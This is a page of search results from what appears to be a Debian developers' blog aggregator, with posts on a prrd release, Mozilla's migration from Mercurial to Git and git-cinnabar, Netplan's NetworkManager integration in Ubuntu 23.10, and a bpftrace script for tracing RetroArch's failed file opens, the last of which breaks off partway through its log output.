Search Results: "ncm"

7 March 2024

Dirk Eddelbuettel: prrd 0.0.6 at CRAN: Several Improvements

Thrilled to share that a new version of prrd arrived at CRAN yesterday in a first update in two and a half years. prrd facilitates the parallel running [of] reverse dependency [checks] when preparing R packages. It is used extensively for releases I make of Rcpp, RcppArmadillo, RcppEigen, BH, and others. prrd screenshot image The key idea of prrd is simple, and described in some more detail on its webpage and its GitHub repo. Reverse dependency checks are an important part of package development that is easily done in a (serial) loop. But these checks are also generally embarassingly parallel as there is no or little interdependency between them (besides maybe shared build depedencies). See the (dated) screenshot (running six parallel workers, arranged in a split byobu session). This release, the first since 2021, brings a number of enhancments. In particular, the summary function is now improved in several ways. Josh also put in a nice PR that generalizes some setup defaults and values. The release is summarised in the NEWS entry:

Changes in prrd version 0.0.6 (2024-03-06)
  • The summary function has received several enhancements:
    • Extended summary is only running when failures are seen.
    • The summariseQueue function now displays an anticipated completion time and remaining duration.
    • The use of optional package foghorn has been refined, and refactored, when running summaries.
  • The dequeueJobs.r scripts can receive a date argument, the date can be parse via anydate if anytime ins present.
  • The enqueeJobs.r now considers skipped package when running 'addfailed' while ensuring selecting packages are still on CRAN.
  • The CI setup has been updated (twice),
  • Enqueing and dequing functions and scripts now support relative directories, updated documentation (#18 by Joshua Ulrich).

Courtesy of my CRANberries, there is also a diffstat report for this release. If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

21 November 2023

Mike Hommey: How I (kind of) killed Mercurial at Mozilla

Did you hear the news? Firefox development is moving from Mercurial to Git. While the decision is far from being mine, and I was barely involved in the small incremental changes that ultimately led to this decision, I feel I have to take at least some responsibility. And if you are one of those who would rather use Mercurial than Git, you may direct all your ire at me. But let's take a step back and review the past 25 years leading to this decision. You'll forgive me for skipping some details and any possible inaccuracies. This is already a long post, while I could have been more thorough, even I think that would have been too much. This is also not an official Mozilla position, only my personal perception and recollection as someone who was involved at times, but mostly an observer from a distance. From CVS to DVCS From its release in 1998, the Mozilla source code was kept in a CVS repository. If you're too young to know what CVS is, let's just say it's an old school version control system, with its set of problems. Back then, it was mostly ubiquitous in the Open Source world, as far as I remember. In the early 2000s, the Subversion version control system gained some traction, solving some of the problems that came with CVS. Incidentally, Subversion was created by Jim Blandy, who now works at Mozilla on completely unrelated matters. In the same period, the Linux kernel development moved from CVS to Bitkeeper, which was more suitable to the distributed nature of the Linux community. BitKeeper had its own problem, though: it was the opposite of Open Source, but for most pragmatic people, it wasn't a real concern because free access was provided. Until it became a problem: someone at OSDL developed an alternative client to BitKeeper, and licenses of BitKeeper were rescinded for OSDL members, including Linus Torvalds (they were even prohibited from purchasing one). Following this fiasco, in April 2005, two weeks from each other, both Git and Mercurial were born. The former was created by Linus Torvalds himself, while the latter was developed by Olivia Mackall, who was a Linux kernel developer back then. And because they both came out of the same community for the same needs, and the same shared experience with BitKeeper, they both were similar distributed version control systems. Interestingly enough, several other DVCSes existed: In this landscape, the major difference Git was making at the time was that it was blazing fast. Almost incredibly so, at least on Linux systems. That was less true on other platforms (especially Windows). It was a game-changer for handling large codebases in a smooth manner. Anyways, two years later, in 2007, Mozilla decided to move its source code not to Bzr, not to Git, not to Subversion (which, yes, was a contender), but to Mercurial. The decision "process" was laid down in two rather colorful blog posts. My memory is a bit fuzzy, but I don't recall that it was a particularly controversial choice. All of those DVCSes were still young, and there was no definite "winner" yet (GitHub hadn't even been founded). It made the most sense for Mozilla back then, mainly because the Git experience on Windows still wasn't there, and that mattered a lot for Mozilla, with its diverse platform support. As a contributor, I didn't think much of it, although to be fair, at the time, I was mostly consuming the source tarballs. Personal preferences Digging through my archives, I've unearthed a forgotten chapter: I did end up setting up both a Mercurial and a Git mirror of the Firefox source repository on alioth.debian.org. Alioth.debian.org was a FusionForge-based collaboration system for Debian developers, similar to SourceForge. It was the ancestor of salsa.debian.org. I used those mirrors for the Debian packaging of Firefox (cough cough Iceweasel). The Git mirror was created with hg-fast-export, and the Mercurial mirror was only a necessary step in the process. By that time, I had converted my Subversion repositories to Git, and switched off SVK. Incidentally, I started contributing to Git around that time as well. I apparently did this not too long after Mozilla switched to Mercurial. As a Linux user, I think I just wanted the speed that Mercurial was not providing. Not that Mercurial was that slow, but the difference between a couple seconds and a couple hundred milliseconds was a significant enough difference in user experience for me to prefer Git (and Firefox was not the only thing I was using version control for) Other people had also similarly created their own mirror, or with other tools. But none of them were "compatible": their commit hashes were different. Hg-git, used by the latter, was putting extra information in commit messages that would make the conversion differ, and hg-fast-export would just not be consistent with itself! My mirror is long gone, and those have not been updated in more than a decade. I did end up using Mercurial, when I got commit access to the Firefox source repository in April 2010. I still kept using Git for my Debian activities, but I now was also using Mercurial to push to the Mozilla servers. I joined Mozilla as a contractor a few months after that, and kept using Mercurial for a while, but as a, by then, long time Git user, it never really clicked for me. It turns out, the sentiment was shared by several at Mozilla. Git incursion In the early 2010s, GitHub was becoming ubiquitous, and the Git mindshare was getting large. Multiple projects at Mozilla were already entirely hosted on GitHub. As for the Firefox source code base, Mozilla back then was kind of a Wild West, and engineers being engineers, multiple people had been using Git, with their own inconvenient workflows involving a local Mercurial clone. The most popular set of scripts was moz-git-tools, to incorporate changes in a local Git repository into the local Mercurial copy, to then send to Mozilla servers. In terms of the number of people doing that, though, I don't think it was a lot of people, probably a few handfuls. On my end, I was still keeping up with Mercurial. I think at that time several engineers had their own unofficial Git mirrors on GitHub, and later on Ehsan Akhgari provided another mirror, with a twist: it also contained the full CVS history, which the canonical Mercurial repository didn't have. This was particularly interesting for engineers who needed to do some code archeology and couldn't get past the 2007 cutoff of the Mercurial repository. I think that mirror ultimately became the official-looking, but really unofficial, mozilla-central repository on GitHub. On a side note, a Mercurial repository containing the CVS history was also later set up, but that didn't lead to something officially supported on the Mercurial side. Some time around 2011~2012, I started to more seriously consider using Git for work myself, but wasn't satisfied with the workflows others had set up for themselves. I really didn't like the idea of wasting extra disk space keeping a Mercurial clone around while using a Git mirror. I wrote a Python script that would use Mercurial as a library to access a remote repository and produce a git-fast-import stream. That would allow the creation of a git repository without a local Mercurial clone. It worked quite well, but it was not able to incrementally update. Other, more complete tools existed already, some of which I mentioned above. But as time was passing and the size and depth of the Mercurial repository was growing, these tools were showing their limits and were too slow for my taste, especially for the initial clone. Boot to Git In the same time frame, Mozilla ventured in the Mobile OS sphere with Boot to Gecko, later known as Firefox OS. What does that have to do with version control? The needs of third party collaborators in the mobile space led to the creation of what is now the gecko-dev repository on GitHub. As I remember it, it was challenging to create, but once it was there, Git users could just clone it and have a working, up-to-date local copy of the Firefox source code and its history... which they could already have, but this was the first officially supported way of doing so. Coincidentally, Ehsan's unofficial mirror was having trouble (to the point of GitHub closing the repository) and was ultimately shut down in December 2013. You'll often find comments on the interwebs about how GitHub has become unreliable since the Microsoft acquisition. I can't really comment on that, but if you think GitHub is unreliable now, rest assured that it was worse in its beginning. And its sustainability as a platform also wasn't a given, being a rather new player. So on top of having this official mirror on GitHub, Mozilla also ventured in setting up its own Git server for greater control and reliability. But the canonical repository was still the Mercurial one, and while Git users now had a supported mirror to pull from, they still had to somehow interact with Mercurial repositories, most notably for the Try server. Git slowly creeping in Firefox build tooling Still in the same time frame, tooling around building Firefox was improving drastically. For obvious reasons, when version control integration was needed in the tooling, Mercurial support was always a no-brainer. The first explicit acknowledgement of a Git repository for the Firefox source code, other than the addition of the .gitignore file, was bug 774109. It added a script to install the prerequisites to build Firefox on macOS (still called OSX back then), and that would print a message inviting people to obtain a copy of the source code with either Mercurial or Git. That was a precursor to current bootstrap.py, from September 2012. Following that, as far as I can tell, the first real incursion of Git in the Firefox source tree tooling happened in bug 965120. A few days earlier, bug 952379 had added a mach clang-format command that would apply clang-format-diff to the output from hg diff. Obviously, running hg diff on a Git working tree didn't work, and bug 965120 was filed, and support for Git was added there. That was in January 2014. A year later, when the initial implementation of mach artifact was added (which ultimately led to artifact builds), Git users were an immediate thought. But while they were considered, it was not to support them, but to avoid actively breaking their workflows. Git support for mach artifact was eventually added 14 months later, in March 2016. From gecko-dev to git-cinnabar Let's step back a little here, back to the end of 2014. My user experience with Mercurial had reached a level of dissatisfaction that was enough for me to decide to take that script from a couple years prior and make it work for incremental updates. That meant finding a way to store enough information locally to be able to reconstruct whatever the incremental updates would be relying on (guess why other tools hid a local Mercurial clone under hood). I got something working rather quickly, and after talking to a few people about this side project at the Mozilla Portland All Hands and seeing their excitement, I published a git-remote-hg initial prototype on the last day of the All Hands. Within weeks, the prototype gained the ability to directly push to Mercurial repositories, and a couple months later, was renamed to git-cinnabar. At that point, as a Git user, instead of cloning the gecko-dev repository from GitHub and switching to a local Mercurial repository whenever you needed to push to a Mercurial repository (i.e. the aforementioned Try server, or, at the time, for reviews), you could just clone and push directly from/to Mercurial, all within Git. And it was fast too. You could get a full clone of mozilla-central in less than half an hour, when at the time, other similar tools would take more than 10 hours (needless to say, it's even worse now). Another couple months later (we're now at the end of April 2015), git-cinnabar became able to start off a local clone of the gecko-dev repository, rather than clone from scratch, which could be time consuming. But because git-cinnabar and the tool that was updating gecko-dev weren't producing the same commits, this setup was cumbersome and not really recommended. For instance, if you pushed something to mozilla-central with git-cinnabar from a gecko-dev clone, it would come back with a different commit hash in gecko-dev, and you'd have to deal with the divergence. Eventually, in April 2020, the scripts updating gecko-dev were switched to git-cinnabar, making the use of gecko-dev alongside git-cinnabar a more viable option. Ironically(?), the switch occurred to ease collaboration with KaiOS (you know, the mobile OS born from the ashes of Firefox OS). Well, okay, in all honesty, when the need of syncing in both directions between Git and Mercurial (we only had ever synced from Mercurial to Git) came up, I nudged Mozilla in the direction of git-cinnabar, which, in my (biased but still honest) opinion, was the more reliable option for two-way synchronization (we did have regular conversion problems with hg-git, nothing of the sort has happened since the switch). One Firefox repository to rule them all For reasons I don't know, Mozilla decided to use separate Mercurial repositories as "branches". With the switch to the rapid release process in 2011, that meant one repository for nightly (mozilla-central), one for aurora, one for beta, and one for release. And with the addition of Extended Support Releases in 2012, we now add a new ESR repository every year. Boot to Gecko also had its own branches, and so did Fennec (Firefox for Mobile, before Android). There are a lot of them. And then there are also integration branches, where developer's work lands before being merged in mozilla-central (or backed out if it breaks things), always leaving mozilla-central in a (hopefully) good state. Only one of them remains in use today, though. I can only suppose that the way Mercurial branches work was not deemed practical. It is worth noting, though, that Mercurial branches are used in some cases, to branch off a dot-release when the next major release process has already started, so it's not a matter of not knowing the feature exists or some such. In 2016, Gregory Szorc set up a new repository that would contain them all (or at least most of them), which eventually became what is now the mozilla-unified repository. This would e.g. simplify switching between branches when necessary. 7 years later, for some reason, the other "branches" still exist, but most developers are expected to be using mozilla-unified. Mozilla's CI also switched to using mozilla-unified as base repository. Honestly, I'm not sure why the separate repositories are still the main entry point for pushes, rather than going directly to mozilla-unified, but it probably comes down to switching being work, and not being a top priority. Also, it probably doesn't help that working with multiple heads in Mercurial, even (especially?) with bookmarks, can be a source of confusion. To give an example, if you aren't careful, and do a plain clone of the mozilla-unified repository, you may not end up on the latest mozilla-central changeset, but rather, e.g. one from beta, or some other branch, depending which one was last updated. Hosting is simple, right? Put your repository on a server, install hgweb or gitweb, and that's it? Maybe that works for... Mercurial itself, but that repository "only" has slightly over 50k changesets and less than 4k files. Mozilla-central has more than an order of magnitude more changesets (close to 700k) and two orders of magnitude more files (more than 700k if you count the deleted or moved files, 350k if you count the currently existing ones). And remember, there are a lot of "duplicates" of this repository. And I didn't even mention user repositories and project branches. Sure, it's a self-inflicted pain, and you'd think it could probably(?) be mitigated with shared repositories. But consider the simple case of two repositories: mozilla-central and autoland. You make autoland use mozilla-central as a shared repository. Now, you push something new to autoland, it's stored in the autoland datastore. Eventually, you merge to mozilla-central. Congratulations, it's now in both datastores, and you'd need to clean-up autoland if you wanted to avoid the duplication. Now, you'd think mozilla-unified would solve these issues, and it would... to some extent. Because that wouldn't cover user repositories and project branches briefly mentioned above, which in GitHub parlance would be considered as Forks. So you'd want a mega global datastore shared by all repositories, and repositories would need to only expose what they really contain. Does Mercurial support that? I don't think so (okay, I'll give you that: even if it doesn't, it could, but that's extra work). And since we're talking about a transition to Git, does Git support that? You may have read about how you can link to a commit from a fork and make-pretend that it comes from the main repository on GitHub? At least, it shows a warning, now. That's essentially the architectural reason why. So the actual answer is that Git doesn't support it out of the box, but GitHub has some backend magic to handle it somehow (and hopefully, other things like Gitea, Girocco, Gitlab, etc. have something similar). Now, to come back to the size of the repository. A repository is not a static file. It's a server with which you negotiate what you have against what it has that you want. Then the server bundles what you asked for based on what you said you have. Or in the opposite direction, you negotiate what you have that it doesn't, you send it, and the server incorporates what you sent it. Fortunately the latter is less frequent and requires authentication. But the former is more frequent and CPU intensive. Especially when pulling a large number of changesets, which, incidentally, cloning is. "But there is a solution for clones" you might say, which is true. That's clonebundles, which offload the CPU intensive part of cloning to a single job scheduled regularly. Guess who implemented it? Mozilla. But that only covers the cloning part. We actually had laid the ground to support offloading large incremental updates and split clones, but that never materialized. Even with all that, that still leaves you with a server that can display file contents, diffs, blames, provide zip archives of a revision, and more, all of which are CPU intensive in their own way. And these endpoints are regularly abused, and cause extra load to your servers, yes plural, because of course a single server won't handle the load for the number of users of your big repositories. And because your endpoints are abused, you have to close some of them. And I'm not mentioning the Try repository with its tens of thousands of heads, which brings its own sets of problems (and it would have even more heads if we didn't fake-merge them once in a while). Of course, all the above applies to Git (and it only gained support for something akin to clonebundles last year). So, when the Firefox OS project was stopped, there wasn't much motivation to continue supporting our own Git server, Mercurial still being the official point of entry, and git.mozilla.org was shut down in 2016. The growing difficulty of maintaining the status quo Slowly, but steadily in more recent years, as new tooling was added that needed some input from the source code manager, support for Git was more and more consistently added. But at the same time, as people left for other endeavors and weren't necessarily replaced, or more recently with layoffs, resources allocated to such tooling have been spread thin. Meanwhile, the repository growth didn't take a break, and the Try repository was becoming an increasing pain, with push times quite often exceeding 10 minutes. The ongoing work to move Try pushes to Lando will hide the problem under the rug, but the underlying problem will still exist (although the last version of Mercurial seems to have improved things). On the flip side, more and more people have been relying on Git for Firefox development, to my own surprise, as I didn't really push for that to happen. It just happened organically, by ways of git-cinnabar existing, providing a compelling experience to those who prefer Git, and, I guess, word of mouth. I was genuinely surprised when I recently heard the use of Git among moz-phab users had surpassed a third. I did, however, occasionally orient people who struggled with Mercurial and said they were more familiar with Git, towards git-cinnabar. I suspect there's a somewhat large number of people who never realized Git was a viable option. But that, on its own, can come with its own challenges: if you use git-cinnabar without being backed by gecko-dev, you'll have a hard time sharing your branches on GitHub, because you can't push to a fork of gecko-dev without pushing your entire local repository, as they have different commit histories. And switching to gecko-dev when you weren't already using it requires some extra work to rebase all your local branches from the old commit history to the new one. Clone times with git-cinnabar have also started to go a little out of hand in the past few years, but this was mitigated in a similar manner as with the Mercurial cloning problem: with static files that are refreshed regularly. Ironically, that made cloning with git-cinnabar faster than cloning with Mercurial. But generating those static files is increasingly time-consuming. As of writing, generating those for mozilla-unified takes close to 7 hours. I was predicting clone times over 10 hours "in 5 years" in a post from 4 years ago, I wasn't too far off. With exponential growth, it could still happen, although to be fair, CPUs have improved since. I will explore the performance aspect in a subsequent blog post, alongside the upcoming release of git-cinnabar 0.7.0-b1. I don't even want to check how long it now takes with hg-git or git-remote-hg (they were already taking more than a day when git-cinnabar was taking a couple hours). I suppose it's about time that I clarify that git-cinnabar has always been a side-project. It hasn't been part of my duties at Mozilla, and the extent to which Mozilla supports git-cinnabar is in the form of taskcluster workers on the community instance for both git-cinnabar CI and generating those clone bundles. Consequently, that makes the above git-cinnabar specific issues a Me problem, rather than a Mozilla problem. Taking the leap I can't talk for the people who made the proposal to move to Git, nor for the people who put a green light on it. But I can at least give my perspective. Developers have regularly asked why Mozilla was still using Mercurial, but I think it was the first time that a formal proposal was laid out. And it came from the Engineering Workflow team, responsible for issue tracking, code reviews, source control, build and more. It's easy to say "Mozilla should have chosen Git in the first place", but back in 2007, GitHub wasn't there, Bitbucket wasn't there, and all the available options were rather new (especially compared to the then 21 years-old CVS). I think Mozilla made the right choice, all things considered. Had they waited a couple years, the story might have been different. You might say that Mozilla stayed with Mercurial for so long because of the sunk cost fallacy. I don't think that's true either. But after the biggest Mercurial repository hosting service turned off Mercurial support, and the main contributor to Mercurial going their own way, it's hard to ignore that the landscape has evolved. And the problems that we regularly encounter with the Mercurial servers are not going to get any better as the repository continues to grow. As far as I know, all the Mercurial repositories bigger than Mozilla's are... not using Mercurial. Google has its own closed-source server, and Facebook has another of its own, and it's not really public either. With resources spread thin, I don't expect Mozilla to be able to continue supporting a Mercurial server indefinitely (although I guess Octobus could be contracted to give a hand, but is that sustainable?). Mozilla, being a champion of Open Source, also doesn't live in a silo. At some point, you have to meet your contributors where they are. And the Open Source world is now majoritarily using Git. I'm sure the vast majority of new hires at Mozilla in the past, say, 5 years, know Git and have had to learn Mercurial (although they arguably didn't need to). Even within Mozilla, with thousands(!) of repositories on GitHub, Firefox is now actually the exception rather than the norm. I should even actually say Desktop Firefox, because even Mobile Firefox lives on GitHub (although Fenix is moving back in together with Desktop Firefox, and the timing is such that that will probably happen before Firefox moves to Git). Heck, even Microsoft moved to Git! With a significant developer base already using Git thanks to git-cinnabar, and all the constraints and problems I mentioned previously, it actually seems natural that a transition (finally) happens. However, had git-cinnabar or something similarly viable not existed, I don't think Mozilla would be in a position to take this decision. On one hand, it probably wouldn't be in the current situation of having to support both Git and Mercurial in the tooling around Firefox, nor the resource constraints related to that. But on the other hand, it would be farther from supporting Git and being able to make the switch in order to address all the other problems. But... GitHub? I hope I made a compelling case that hosting is not as simple as it can seem, at the scale of the Firefox repository. It's also not Mozilla's main focus. Mozilla has enough on its plate with the migration of existing infrastructure that does rely on Mercurial to understandably not want to figure out the hosting part, especially with limited resources, and with the mixed experience hosting both Mercurial and git has been so far. After all, GitHub couldn't even display things like the contributors' graph on gecko-dev until recently, and hosting is literally their job! They still drop the ball on large blames (thankfully we have searchfox for those). Where does that leave us? Gitlab? For those criticizing GitHub for being proprietary, that's probably not open enough. Cloud Source Repositories? "But GitHub is Microsoft" is a complaint I've read a lot after the announcement. Do you think Google hosting would have appealed to these people? Bitbucket? I'm kind of surprised it wasn't in the list of providers that were considered, but I'm also kind of glad it wasn't (and I'll leave it at that). I think the only relatively big hosting provider that could have made the people criticizing the choice of GitHub happy is Codeberg, but I hadn't even heard of it before it was mentioned in response to Mozilla's announcement. But really, with literal thousands of Mozilla repositories already on GitHub, with literal tens of millions repositories on the platform overall, the pragmatic in me can't deny that it's an attractive option (and I can't stress enough that I wasn't remotely close to the room where the discussion about what choice to make happened). "But it's a slippery slope". I can see that being a real concern. LLVM also moved its repository to GitHub (from a (I think) self-hosted Subversion server), and ended up moving off Bugzilla and Phabricator to GitHub issues and PRs four years later. As an occasional contributor to LLVM, I hate this move. I hate the GitHub review UI with a passion. At least, right now, GitHub PRs are not a viable option for Mozilla, for their lack of support for security related PRs, and the more general shortcomings in the review UI. That doesn't mean things won't change in the future, but let's not get too far ahead of ourselves. The move to Git has just been announced, and the migration has not even begun yet. Just because Mozilla is moving the Firefox repository to GitHub doesn't mean it's locked in forever or that all the eggs are going to be thrown into one basket. If bridges need to be crossed in the future, we'll see then. So, what's next? The official announcement said we're not expecting the migration to really begin until six months from now. I'll swim against the current here, and say this: the earlier you can switch to git, the earlier you'll find out what works and what doesn't work for you, whether you already know Git or not. While there is not one unique workflow, here's what I would recommend anyone who wants to take the leap off Mercurial right now: As there is no one-size-fits-all workflow, I won't tell you how to organize yourself from there. I'll just say this: if you know the Mercurial sha1s of your previous local work, you can create branches for them with:
$ git branch <branch_name> $(git cinnabar hg2git <hg_sha1>)
At this point, you should have everything available on the Git side, and you can remove the .hg directory. Or move it into some empty directory somewhere else, just in case. But don't leave it here, it will only confuse the tooling. Artifact builds WILL be confused, though, and you'll have to ./mach configure before being able to do anything. You may also hit bug 1865299 if your working tree is older than this post. If you have any problem or question, you can ping me on #git-cinnabar or #git on Matrix. I'll put the instructions above somewhere on wiki.mozilla.org, and we can collaboratively iterate on them. Now, what the announcement didn't say is that the Git repository WILL NOT be gecko-dev, doesn't exist yet, and WON'T BE COMPATIBLE (trust me, it'll be for the better). Why did I make you do all the above, you ask? Because that won't be a problem. I'll have you covered, I promise. The upcoming release of git-cinnabar 0.7.0-b1 will have a way to smoothly switch between gecko-dev and the future repository (incidentally, that will also allow to switch from a pure git-cinnabar clone to a gecko-dev one, for the git-cinnabar users who have kept reading this far). What about git-cinnabar? With Mercurial going the way of the dodo at Mozilla, my own need for git-cinnabar will vanish. Legitimately, this begs the question whether it will still be maintained. I can't answer for sure. I don't have a crystal ball. However, the needs of the transition itself will motivate me to finish some long-standing things (like finalizing the support for pushing merges, which is currently behind an experimental flag) or implement some missing features (support for creating Mercurial branches). Git-cinnabar started as a Python script, it grew a sidekick implemented in C, which then incorporated some Rust, which then cannibalized the Python script and took its place. It is now close to 90% Rust, and 10% C (if you don't count the code from Git that is statically linked to it), and has sort of become my Rust playground (it's also, I must admit, a mess, because of its history, but it's getting better). So the day to day use with Mercurial is not my sole motivation to keep developing it. If it were, it would stay stagnant, because all the features I need are there, and the speed is not all that bad, although I know it could be better. Arguably, though, git-cinnabar has been relatively stagnant feature-wise, because all the features I need are there. So, no, I don't expect git-cinnabar to die along Mercurial use at Mozilla, but I can't really promise anything either. Final words That was a long post. But there was a lot of ground to cover. And I still skipped over a bunch of things. I hope I didn't bore you to death. If I did and you're still reading... what's wrong with you? ;) So this is the end of Mercurial at Mozilla. So long, and thanks for all the fish. But this is also the beginning of a transition that is not easy, and that will not be without hiccups, I'm sure. So fasten your seatbelts (plural), and welcome the change. To circle back to the clickbait title, did I really kill Mercurial at Mozilla? Of course not. But it's like I stumbled upon a few sparks and tossed a can of gasoline on them. I didn't start the fire, but I sure made it into a proper bonfire... and now it has turned into a wildfire. And who knows? 15 years from now, someone else might be looking back at how Mozilla picked Git at the wrong time, and that, had we waited a little longer, we would have picked some yet to come new horse. But hey, that's the tech cycle for you.

12 November 2023

Lukas M rdian: Netplan brings consistent network configuration across Desktop, Server, Cloud and IoT

Ubuntu 23.10 Mantic Minotaur Desktop, showing network settings We released Ubuntu 23.10 Mantic Minotaur on 12 October 2023, shipping its proven and trusted network stack based on Netplan. Netplan is the default tool to configure Linux networking on Ubuntu since 2016. In the past, it was primarily used to control the Server and Cloud variants of Ubuntu, while on Desktop systems it would hand over control to NetworkManager. In Ubuntu 23.10 this disparity in how to control the network stack on different Ubuntu platforms was closed by integrating NetworkManager with the underlying Netplan stack. Netplan could already be used to describe network connections on Desktop systems managed by NetworkManager. But network connections created or modified through NetworkManager would not be known to Netplan, so it was a one-way street. Activating the bidirectional NetworkManager-Netplan integration allows for any configuration change made through NetworkManager to be propagated back into Netplan. Changes made in Netplan itself will still be visible in NetworkManager, as before. This way, Netplan can be considered the single source of truth for network configuration across all variants of Ubuntu, with the network configuration stored in /etc/netplan/, using Netplan s common and declarative YAML format.

Netplan Desktop integration On workstations, the most common scenario is for users to configure networking through NetworkManager s graphical interface, instead of driving it through Netplan s declarative YAML files. Netplan ships a libnetplan library that provides an API to access Netplan s parser and validation internals, which is now used by NetworkManager to store any network interface configuration changes in Netplan. For instance, network configuration defined through NetworkManager s graphical UI or D-Bus API will be exported to Netplan s native YAML format in the common location at /etc/netplan/. This way, the only thing administrators need to care about when managing a fleet of Desktop installations is Netplan. Furthermore, programmatic access to all network configuration is now easily accessible to other system components integrating with Netplan, such as snapd. This solution has already been used in more confined environments, such as Ubuntu Core and is now enabled by default on Ubuntu 23.10 Desktop.

Migration of existing connection profiles On installation of the NetworkManager package (network-manager >= 1.44.2-1ubuntu1) in Ubuntu 23.10, all your existing connection profiles from /etc/NetworkManager/system-connections/ will automatically and transparently be migrated to Netplan s declarative YAML format and stored in its common configuration directory /etc/netplan/. The same migration will happen in the background whenever you add or modify any connection profile through the NetworkManager user interface, integrated with GNOME Shell. From this point on, Netplan will be aware of your entire network configuration and you can query it using its CLI tools, such as sudo netplan get or sudo netplan status without interrupting traditional NetworkManager workflows (UI, nmcli, nmtui, D-Bus APIs). You can observe this migration on the apt-get command line, watching out for logs like the following:
Setting up network-manager (1.44.2-1ubuntu1.1) ...
Migrating HomeNet (9d087126-ae71-4992-9e0a-18c5ea92a4ed) to /etc/netplan
Migrating eduroam (37d643bb-d81d-4186-9402-7b47632c59b1) to /etc/netplan
Migrating DebConf (f862be9c-fb06-4c0f-862f-c8e210ca4941) to /etc/netplan
In order to prepare for a smooth transition, NetworkManager tests were integrated into Netplan s continuous integration pipeline at the upstream GitHub repository. Furthermore, we implemented a passthrough method of handling unknown or new settings that cannot yet be fully covered by Netplan, making Netplan future-proof for any upcoming NetworkManager release.

The future of Netplan Netplan has established itself as the proven network stack across all variants of Ubuntu Desktop, Server, Cloud, or Embedded. It has been the default stack across many Ubuntu LTS releases, serving millions of users over the years. With the bidirectional integration between NetworkManager and Netplan the final piece of the puzzle is implemented to consider Netplan the single source of truth for network configuration on Ubuntu. With Debian choosing Netplan to be the default network stack for their cloud images, it is also gaining traction outside the Ubuntu ecosystem and growing into the wider open source community. Within the development cycle for Ubuntu 24.04 LTS, we will polish the Netplan codebase to be ready for a 1.0 release, coming with certain guarantees on API and ABI stability, so that other distributions and 3rd party integrations can rely on Netplan s interfaces. First steps into that direction have already been taken, as the Netplan team reached out to the Debian community at DebConf 2023 in Kochi/India to evaluate possible synergies.

Conclusion Netplan can be used transparently to control a workstation s network configuration and plays hand-in-hand with many desktop environments through its tight integration with NetworkManager. It allows for easy network monitoring, using common graphical interfaces and provides a single source of truth to network administrators, allowing for configuration of Ubuntu Desktop fleets in a streamlined and declarative way. You can try this new functionality hands-on by following the Access Desktop NetworkManager settings through Netplan tutorial.
If you want to learn more, feel free to follow our activities on Netplan.io, GitHub, Launchpad, IRC or our Netplan Developer Diaries blog on discourse.

6 January 2023

Jonathan McDowell: Finally making use of bpftrace

I am old enough to remember when BPF meant the traditional Berkeley Packet Filter, and was confined to filtering network packets. It s grown into much, much, more as eBPF and getting familiar with it so that I can add it to the suite of tips and tricks I can call upon has been on my to-do list for a while. To this end I was lucky enough to attend a live walk through of bpftrace last year. bpftrace is a high level tool that allows the easy creation and execution of eBPF tracers under Linux. Recently I ve been working on updating the RetroArch packages in Debian and as I was doing so I realised there was a need to update the quite outdated retroarch-assets package, which contains various icons and images used for the user interface. I wanted to try and re-generate as many of the artefacts as I could, to ensure the proper source was available. However it wasn t always clear which files were actually needed and which were either source or legacy. So I wanted to trace file opens by retroarch and see when it was failing to find files. Traditionally this is something I d have used strace for, but it seemed like a great opportunity to try out bpftrace. It turns out bpftrace ships with an example, opensnoop.bt which provided details of hooking the open syscall entry + exit and providing details of all files opened on the system. I only wanted to track opens by the retroarch binary that failed, so I made a couple of modifications:
retro-failed-open-snoop.bt
#!/usr/bin/env bpftrace
/*
 * retro-failed-open-snoop - snoop failed opens by RetroArch
 *
 * Based on:
 * opensnoop	Trace open() syscalls.
 *		For Linux, uses bpftrace and eBPF.
 *
 * Copyright 2018 Netflix, Inc.
 * Licensed under the Apache License, Version 2.0 (the "License")
 *
 * 08-Sep-2018	Brendan Gregg	Created this.
 */
BEGIN
 
	printf("Tracing open syscalls... Hit Ctrl-C to end.\n");
	printf("%-6s %-16s %3s %s\n", "PID", "COMM", "ERR", "PATH");
 
tracepoint:syscalls:sys_enter_open,
tracepoint:syscalls:sys_enter_openat
 
	@filename[tid] = args->filename;
 
tracepoint:syscalls:sys_exit_open,
tracepoint:syscalls:sys_exit_openat
/@filename[tid]/
 
	$ret = args->ret;
	$errno = $ret > 0 ? 0 : - $ret;
	if (($ret <= 0) && (strncmp("retroarch", comm, 9) == 0) )  
		printf("%-6d %-16s %3d %s\n", pid, comm, $errno,
		    str(@filename[tid]));
	 
	delete(@filename[tid]);
 
END
 
	clear(@filename);
 
I had to install bpftrace (apt install bpftrace) and then I ran bpftrace -o retro.log retro-failed-open-snoop.bt as root and fired up retroarch as a normal user.
bpftrace failed open log for retroarch
Attaching 6 probes...
Tracing open syscalls... Hit Ctrl-C to end.
PID    COMM             ERR PATH
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/glibc-hwcaps/x86-64-v2/lib
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/tls/x86_64/x86_64/libpulse
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/tls/x86_64/libpulsecommon-
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/tls/x86_64/libpulsecommon-
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/tls/libpulsecommon-16.1.so
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/x86_64/x86_64/libpulsecomm
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/x86_64/libpulsecommon-16.1
3394   retroarch          2 /usr/lib/x86_64-linux-gnu/pulseaudio/x86_64/libpulsecommon-16.1
3394   retroarch          2 /etc/gcrypt/hwf.deny
3394   retroarch          2 /lib/x86_64-linux-gnu/glibc-hwcaps/x86-64-v2/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/tls/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/tls/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/tls/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/x86_64/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/x86_64/libgamemode.so.0
3394   retroarch          2 /lib/x86_64-linux-gnu/x86_64/libgamemode.so.0
